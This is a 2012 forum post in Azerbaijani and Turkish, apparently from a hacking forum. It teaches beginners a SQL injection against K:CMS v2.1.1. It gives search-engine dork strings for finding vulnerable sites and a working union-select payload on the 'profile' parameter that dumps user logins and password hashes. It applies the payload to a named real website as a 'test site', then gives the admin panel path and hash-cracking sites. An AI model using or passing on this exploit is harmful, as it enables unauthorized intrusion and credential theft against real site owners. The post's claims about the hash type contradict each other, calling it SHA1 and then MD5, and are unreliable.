Istifadəçi |
2012-05-22 11:46 GMT |
|
|
|
İstifadəçi |
|
Mesaj Sayı : 6 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 0 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : Bodrum |
Ölkə : |
Məslək : Web Tasarım + Hosting |
Yaş : 32 |
Mesaj : |
|
Selamun Aleykum Kardeşlerim. Yeni başlayanlar ve bilmeyenler için bir mövzü paylaşmak istedim Buyrun
Version: K:CMS v2.1.1
Table Version: 5.0.60-log
Arama (Search)
"powered by K:CMS v2.1.1"
"powered by K:CMS v2.1.1" index.php?profile="
Exploittir.
Kod: index.php?profile=-turkishwarriorr'+union+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+kcms_users+--+
Test Site (Denemek için)
http://www.making.cz
Sql enjekte edilmiş hali: [url]http://www.making.cz/index.php?profile=-turkishwarriorr'+union+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+kcms_users+--+[/url]
Admin panel yolu
site/admin.php?function
Şifreleme
SHA1
Sonuç Olarak arkadaşlar karşımıza Admin MD5 Hash'ı çıkıyor. Hash'ı kırmak için bu sitelerde faydalanabilirsiniz.
http://www.md5decrypter.co.uk/sha1-decrypt.aspx
http://www.md5decrypter.co.uk/
Hepinize kolay gelsin arkadaşlar başlangıç için ideal bir SQL injeksiyon method'udur.
Türk Rap Sanatçısı - RapLex
Aynı Zamanda Webmaster & Professional Web Design + Hosting + Reseller
|
Anti-armenia.ORG |
|